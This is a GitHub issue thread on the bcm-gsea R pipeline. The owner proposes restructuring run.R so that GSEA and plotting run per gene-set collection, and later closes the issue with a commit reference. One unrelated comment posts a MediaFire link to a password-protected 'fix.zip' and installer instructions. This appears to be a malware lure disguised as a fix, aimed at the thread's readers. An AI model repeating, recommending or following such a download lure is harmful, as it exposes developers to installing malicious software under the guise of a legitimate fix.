### ISSUE TITLE
change "order of operations"

### ISSUE THREAD

**Issue by asalt** [asalt/bcm-gsea#4]
right now the pipeline is fixed to : `load -> fetch all gene sets for all ranks -> gsea -> produce all plots for all ranks for all genesets`.

but this can be very slow and if there's a crash all following geneset analyses will fail

better to be able to break this up on a per-geneset collection basis

will require reorganizing `run.R`

may be easier to do so after more robust parameter validation is in place https://github.com/asalt/bcm-gsea/issues/3#issue-2489736790

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by asalt** [comment]
finished as of 4e42489cba6444bc77ec8ea2190962d696fa8b5e
